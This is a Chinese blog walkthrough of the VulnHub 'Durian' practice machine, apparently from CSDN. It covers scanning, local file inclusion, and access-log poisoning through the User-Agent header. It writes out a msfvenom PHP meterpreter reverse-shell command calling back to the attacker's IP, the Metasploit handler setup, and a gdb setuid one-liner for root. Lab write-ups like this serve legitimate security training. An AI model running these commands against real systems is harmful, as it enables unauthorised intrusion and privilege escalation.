vulnhub靶场,Durian

最新推荐文章于 2023-03-16 09:57:19 发布
最新推荐文章于 2023-03-16 09:57:19 发布
阅读量320 收藏
点赞数
分类专栏: 靶场实战 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/119044958
版权

vulnhub靶场,Durian

环境准备

靶机下载地址:https://www.vulnhub.com/entry/durian-1,553/
攻击机:kali(192.168.109.128)
靶机:Durian(192.168.109.140)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.140
使用nmap扫描差点目标靶机端口开放情况


开放端口:22、80、7080、8000、8088
查找一下OpenSSH 7.9是否存在漏洞

没有发现漏洞
浏览器访问目标靶机80端口

啥也没有,就是一个图片,查看页面源代码说黑客已经留下了后门

使用dirb扫描网站目录

访问cgi-data目录

发现 getImage.php页面,访问看看

页面一片空白,那查看源代码试试

发现一个php语句,也很明显,该页面是存在一个文件包含漏洞的,使用file参数进行传参
漏洞POC验证,包含密码文件试试

包含密码文件成功,漏洞POC验证成功

渗透过程

已经找到文件包含的位置了,但是没有文件上传的位置,那只能考虑写入木马到日志文件,然后利用文件包含漏洞去包含日志文件即可
网上查找资料发现Durian的默认日志文件路径为/var/log/durian.log/access.log
尝试使用文件包含漏洞包含日志文件
在这里插入图片描述
可以看到成功包含,那就简单了,只需要抓包往里面写入木马就行了
使用burpsuite进行抓包,发送到repeater模块

在UA里写入一句话木马,然后利用文件包含漏洞去执行他

查看回应包,看看命令是否执行

可以看到命令成功执行了
使用msfvenom生成一个木马

msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.109.128 lport=4444 -f raw > shell.txt

kali开启一个临时服务器

然后靶机使用文件包含漏洞将木马文件下载到本地

可以看到kali这边开启的临时服务器有响应了,应该是下载成功了

kali使用msf开始监听

use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.109.128
set lport 4444

输入exploit -j将此次攻击放入后台

使用浏览器访问后门文件

可以看到kali这边成功反弹一个meterpreter

权限提升

查看当前用户的sudo权限

getcap -r / 2>/dev/null
gdb -nx -ex 'python import os;os.setuid(0)' -ex '!bash' -ex quit


切换至其root目录,成功获得flag,靶机Durian渗透结束

super 硕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
qq_62716256的博客
09-14 1945
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
文件上传漏之Durian靶场练习——渗透day13
qq_62716256的博客
09-14 1842
文件上传漏之Durian靶场练习——渗透day13
Durian靶机
小小猪的博客
06-29 275
Durian靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.131 打开80端口 dirb进行目录扫描,能看到有wp-admin,那么就知道后台是wordpress Nikto扫描,发现了/blog/wp-login.php,验证了上面的猜测。 既然有wordpress那就用wpscan来扫描 wpscan --urlhttp://x.x.x.131/blog/--enumerate u 通过这个命令来枚举用户名 ..
Vulnhub-Durian
YangYubo091699的博客
08-08 349
Vulnhub靶机之Durian
VulnHub渗透测试实战靶场-Durian:1
LYJ20010728的博客
08-20 1271
VulnHub渗透测试实战靶场-Durian:1环境下载HA:NARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HA:NARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.141 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
vulnhub:Durain靶机
qq_63283137的博客
09-13 159
每个端口都需进行探测,但8000是nginx代理,信息归属真实的80端口。Wordpress探测工具—wpscan:可以探测admin用户与信息,可用于登录。1.搜索kali同一网段的存在的ip地址:192.168.72.129。发现端口下的web目录,再基于端口进行尝试访问下面每个web目录。准备:部署好Durain靶机,并设置网络配置为nat模式。刷新,查看代码,即可获取到了 / 下的目录。尝试查看etc/passwd的用户信息文件。查看代码,看出访问日志用户。针对扫描出的端口分析。
搭建Vulhub靶场 【附图】
热门推荐
君莫hacker的博客
09-08 2万+
目录0x01简单概述0x02安装环境1. kali设置2. 更新软件源中的所有软件列表3. 安装https协议及CA证书0x03安装步骤一、安装Docker1. 下载安装2. 查看Docker是否安装成功3. 查看docker基本信息二、安装vluhub1. 安装pip32. 安装Docker-Compose3. 查看docker-compose版本三、安装vulhub靶场1. 克隆下载2. 随便进入一个靶场环境目录3. 对靶场进行编译4. 运行此靶场5. 查看启动环境6. 通过浏览器访问7. 关闭此靶场
durian_project
04-10
"Durian_Project"是乌普萨拉大学基因组分析课程的一个项目,旨在让学习者实践和理解基因组数据的分析方法。项目的核心可能是基于一篇相关的学术文章,虽然具体的文章名称未提供,但我们可以假设它涉及了基因组学、...
Durian:github客户端
05-14
Duriangithub客户端
durian:榴莲Debian部署者
05-10
Durian是一套工具,用于自动安装基于Debian的操作系统,特别是Ubuntu。 您可以创建部分Debian软件包归档镜像,轻松设置PXE网络启动并定义几个自定义模板。 最后,您只需一个命令即可部署系统。 部署可以在物理机或...
durian-管理后台UI样式框架
最新发布
04-08
"Durian"是一个专为管理后台设计的UI样式框架,其目标是提供一套高效、美观且易用的界面元素和布局方案,以帮助开发者快速构建功能完善的后台管理系统。这个框架通常包含一系列预定义的CSS样式、JavaScript组件以及...
Durian Web Application Server-开源
04-24
DURIAN是免费的Delphi Web应用程序服务器,用于在Windows(Delphi)和Linux(Kylix)的Pascal服务器端html嵌入脚本语言中制作交互式动态Web文档。
VulnHub系列】Durian靶机
薛定谔嘚喵博客
03-14 159
1)信息收集1、nmap信息挖掘。2、挖掘HTTP服务信息。3、搜寻页面有用的信息(在页面中F12看见有文件包含漏洞,查看/etc/passwd文件,发现包含成功。已经找到文件包含的位置了,但是没有文件上传的位置,那只能考虑写入木马到日志文件,然后利用文件包含漏洞去包含日志文件即可网上查找资料发现Durian的默认日志文件路径为/var/log/durian.log/access.log(也是Apache日志文件))2)再利用bp抓包,修改UA写入一句话木马
vulnhub-durian
HEAVEN569的博客
02-14 815
靶机:durian 下载地址:http://www.vulnhub.com/entry/durian-1,553/ 实验机:kali 2020 windows 10 1.信息收集 1.nmap信息收集 sudo nmap -sS -sV -sC 10.7.184.0/24 //收集信息 得到信息 目标的ip:10.7.184.6 开启的端口和服务 22/tcp ssh , 80/tcp http ,8088/tcp radan-http 7080/t......
VulnHub-Durian靶机详细渗透过程
MRS_jianai的博客
01-01 719
VulnHub-Durian靶机详细渗透过程
vulhub靶场搭建与使用
剁椒鱼头没剁椒的博客
11-26 1万+
本来是不想安装yum源的,但是在安装到Docker-compose的时候发现下载特别慢,然后搜了教程看了一下,说可以快一点,结果发现越弄越复杂,只能说一些教程并不适合自己,这里就按照教程上部分内容来。至于yum源部分,我觉得直接跳过吧,使用Vulhub上一键安装docket,可以直接跳到安装docker-compose,并且一键安装也就几分钟,而这个配置yum源,光更新就花费了十几分钟,至少对于我只是配置一个靶场系统,来说多此一举,也不准备拿这个靶场做其他的事,单单就是一个靶场,所以用处大。
Vulhub 靶场搭建
RestoreJustice的博客
03-16 1884
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。安装 docker 和 docker-compose 后即可开始使用Vulhub,我使用ubuntu2018.04.5搭建官方安装命令如下(详情请见下文)# Run。
vulnhubDurian复现过程
鲨鱼辣椒的博客
06-30 2017
这个靶场还是有些难度的,我之前就试过一次了,卡在一个地方很久后面实在没办法就先放弃了。这两天学习过程中我感觉我好像突然又悟了,所以又把它掏出来,准备今天就拿下它。必拿下! 信息搜集 还是老样子三板斧 扫描网段 目的找到网站的真实IP地址,如果是在真实环境中这一步应该是绕过CDN,或者是搜集一些子域名、旁站c段等一些信息 扫描端口以及开启的各种服务 基本上就扫出来这几个端口和服务,然后8088这个端口的服务是radan—http,我之前没见过就去搜了一下:端口本身(8088)最初注册到
vulnhub靶场,RED: 1
kukudeshuo的博客
02-11 4384
vulnhub靶场,RED: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/red-1,753/ 攻击机:kali(192.168.109.128) 靶机:RED: 1(192.168.109.197) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.197
DurIAN模型介绍
09-18
DurIAN (DurIAN: Duration Informed Attention Network) 是一个基于 Transformer 的语音合成模型,它具有时长感知的注意力机制。该模型的主要目标是解决语音合成中的时长预测问题,即如何准确地预测每个音素的持续...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值